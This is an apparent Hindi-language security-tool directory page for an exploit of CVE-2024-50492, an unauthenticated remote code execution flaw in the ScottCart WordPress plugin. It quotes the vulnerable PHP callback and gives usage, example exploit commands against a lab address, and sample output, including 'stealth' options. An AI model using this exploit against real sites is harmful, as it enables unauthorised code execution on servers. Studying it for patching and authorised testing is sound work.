Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/nxploited/cve-2024-50492
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2024-50492

CVE-2024-50492

ScottCart <= 1.1 - अनधिकृत दूरस्थ कोड निष्पादन

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2024-50492 - ScottCart <= 1.1 RCE शोषण

🔥 ScottCart <= 1.1 के लिए शोषण स्क्रिप्ट - बिना प्रमाणीकरण के रिमोट कोड निष्पादन
🧑‍💻 Nxploit द्वारा – खालेद अलेनाज़ी


📌 विवरण

WordPress के लिए ScottCart प्लगइन (संस्करण ≤ 1.1) रिमोट कोड निष्पादन (RCE) के लिए संवेदनशील है।
यह बिना प्रमाणीकरण के हमलावरों को एक संवेदनशील AJAX एंडपॉइंट के माध्यम से सर्वर पर मनमानी PHP फ़ंक्शन निष्पादित करने की अनुमति देता है।

  • प्लगइन: ScottCart ≤ 1.1
  • कमज़ोरी: बिना प्रमाणीकरण के फ़ंक्शन इंजेक्शन → RCE
  • CVE: CVE-2024-50492
  • CVSS स्कोर: 9.8 - गंभीर

🧠 यह कैसे काम करता है

प्लगइन एक असुरक्षित AJAX एक्शन पंजीकृत करता है:

root@kitploit:~
add_action('wp_ajax_nopriv_scottcart_load_function', 'scottcart_load_function_callback');

जो निष्पादित करता है:

root@kitploit:~
call_user_func($_POST['function']);

हमलावरों को किसी भी मौजूदा PHP फ़ंक्शन को कॉल करने की अनुमति देता है, जैसे:

phpinfo()
  • scottcart_get_the_user_ip()
  • system() ← यदि संशोधित वातावरण में विस्तारित किया गया हो

  • 🚀 शोषण की विशेषताएँ

    • ✅ संवेदनशील एंडपॉइंट को ट्रिगर करने के लिए स्वचालित रूप से तैयार पेलोड भेजता है
    • ✅ तर्क के माध्यम से फ़ंक्शन ओवरराइड की अनुमति देता है
    • ✅ डिफ़ॉल्ट पेलोड: PoC के लिए phpinfo()
    • ✅ आउटपुट को टाइमस्टैम्प वाली फ़ाइल में सहेजता है (उदा., results_2025-03-26_14-33-01.txt)
    • ✅ गुप्तता के लिए कस्टम User-Agent, त्रुटि प्रबंधन, और SSL अनदेखा

    🖥️ उपयोग

    root@kitploit:~
    usage: CVE-2024-50492.py [-h] -u URL [-p PAYLOAD]
    
    ScottCart <= 1.1 - Unauthenticated Remote Code Execution
    By Nxploit Khaled Alenazi.
    
    options:
      -h, --help            Show this help message and exit
      -u URL, --url URL     Target base URL (e.g., http://192.168.100.74:888/wordpress)
      -p PAYLOAD, --payload PAYLOAD
                            Function to call (default: phpinfo)
    

    💡 उदाहरण

    🔍 डिफ़ॉल्ट व्यवहार (phpinfo() के साथ PoC):

    root@kitploit:~
    python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress
    

    🔎 आंतरिक प्लगइन फ़ंक्शन कॉल करें:

    root@kitploit:~
    python3 CVE-2024-50492.py -u http://192.168.100.74:888/wordpress -p scottcart_get_the_user_ip
    

    🧾 आउटपुट उदाहरण

    root@kitploit:~
    [+] Target URL: http://192.168.100.74:888/wordpress
    [+] Payload Function: phpinfo
    [*] Launching exploit...
    [+] Sending payload: function=phpinfo
    [+] Exploit successful! Output:
    
    PHP Version => 8.1.12
    ...
    

    📁 और इसमें सहेजा गया: results_2025-03-26_14-33-01.txt


    🛡️ अस्वीकरण

    यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए है।
    उन सिस्टम के खिलाफ उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।


    💬 क्रेडिट

    • 💻 शोषण द्वारा: Nxploit – खालेद अलेनाज़ी
    • 🛡️ CVE ID: CVE-2024-50492
    टूल डाउनलोड करें